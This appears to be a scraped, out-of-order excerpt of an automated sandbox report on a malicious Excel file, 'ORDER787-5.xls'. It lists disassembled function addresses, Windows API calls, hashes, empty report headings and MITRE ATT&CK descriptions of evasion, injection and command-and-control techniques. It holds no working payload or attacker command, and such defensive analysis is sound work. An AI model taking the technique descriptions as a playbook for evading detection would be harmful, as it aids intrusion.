0x100082d2
0x100082d5
0x100082db
0x100082df
0x100082df
0x100082e5
0x100082ec
0x1000827e
0x1000827e
0x1000827e
0x10008283
0x10008287
0x1000828c
0x10008294

APIs

Part of subcall function 1000420E: __getptd_noexit.LIBCMT ref: 1000420F
Part of subcall function 1000420E: __amsg_exit.LIBCMT ref: 1000421C

__amsg_exit.LIBCMT ref: 10008287
__lock.LIBCMT ref: 10008297
InterlockedDecrement.KERNEL32(?), ref: 100082B4
InterlockedIncrement.KERNEL32(001314B0), ref: 100082DF

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: a7541ba5fce4d6255683143741d85e4f568f9c80b8bdd6a30c28cf9c106d3706
Instruction ID: 96f8920e42d0ce719455b2b7df0774fa86ca3dcf48560f59254a4d7e7cc07f67
Opcode Fuzzy Hash: a7541ba5fce4d6255683143741d85e4f568f9c80b8bdd6a30c28cf9c106d3706
Instruction Fuzzy Hash: 7801C035E01A21DBF711DB64884575E73A0FF047E1F12411AF880AB2A9CF34AE81CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 001E2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 001E2468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 001E24B2

Strings

@, xrefs: 001E2453

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 6db04da010aaa433046c579478e43d571d4b946a2b39be71f77f7a7a3d4dbc3c
Instruction ID: 840e2bbff2c349d11a61fe30c60b38e28af687aa9f89a2d1f1fffee70b70ba8e
Opcode Fuzzy Hash: 6db04da010aaa433046c579478e43d571d4b946a2b39be71f77f7a7a3d4dbc3c
Instruction Fuzzy Hash: A3211AB0A04249EFDF04CF95C894BADBBB9BF44304F248589E905AB280C774AF80DB51

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ORDER787-5.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "ORDER787-5.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 102

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General

Stream Path: Ctls, File Type: data, Stream Size: 68

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550

General

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387

General

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20

General

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767

Function 10002AB0, Relevance: 37.7, APIs: 25, Instructions: 151
memorythreadCOMMON

Function 100018B0, Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 286
libraryloadermemoryCOMMON

Function 002E1000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
windowtimesleepCOMMON

Function 10005FC1, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Function 1000631C, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 10001050, Relevance: 1.3, APIs: 1, Instructions: 22
memoryCOMMON

Function 100026C4, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Function 100050A3, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 1000E6DC, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Function 100043B0, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Function 100040D7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46
libraryloaderCOMMON

Function 1000462B, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Function 10003954, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Function 100014E0, Relevance: 6.1, APIs: 4, Instructions: 104
COMMON

Function 1000DEFB, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Function 10003829, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON